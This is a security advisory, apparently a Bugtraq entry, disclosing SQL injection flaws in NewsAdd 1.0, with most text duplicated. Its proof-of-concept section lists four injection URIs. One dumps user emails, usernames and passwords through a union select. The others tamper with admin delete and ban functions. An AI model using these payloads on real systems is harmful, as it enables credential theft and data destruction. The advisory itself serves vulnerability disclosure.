NewsAdd Multiple SQL Injection Vulnerabilities
BID:53730
Info
NewsAdd Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 53730 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 30 2012 12:00AM |
| Updated: | May 30 2012 12:00AM |
| Credit: | WhiteCollarGroup |
| Vulnerable: |
Thiago Vaini NewsAdd 1.0 |
| Not Vulnerable: | |
Discussion
NewsAdd Multiple SQL Injection Vulnerabilities
NewsAdd is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
NewsAdd 1.0 and prior versions are vulnerable.
NewsAdd is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
NewsAdd 1.0 and prior versions are vulnerable.
Exploit / POC
NewsAdd Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/comentar.php?id=-0' union all select 1,2,3,group_concat(concatemail,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),5 from usuarios--+
http://www.example.com/admin/removerNoticia.php?id=0' or '1'='1&conf=sim
http://www.example.com/admin/listarUsuarios.php?acao=banir&id=0' or '1'='1
http://www.example.com/admin/removerUsuario.php?id=0' or '1'='1&conf=sim
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/comentar.php?id=-0' union all select 1,2,3,group_concat(concatemail,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),5 from usuarios--+
http://www.example.com/admin/removerNoticia.php?id=0' or '1'='1&conf=sim
http://www.example.com/admin/listarUsuarios.php?acao=banir&id=0' or '1'='1
http://www.example.com/admin/removerUsuario.php?id=0' or '1'='1&conf=sim
Solution / Fix
NewsAdd Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].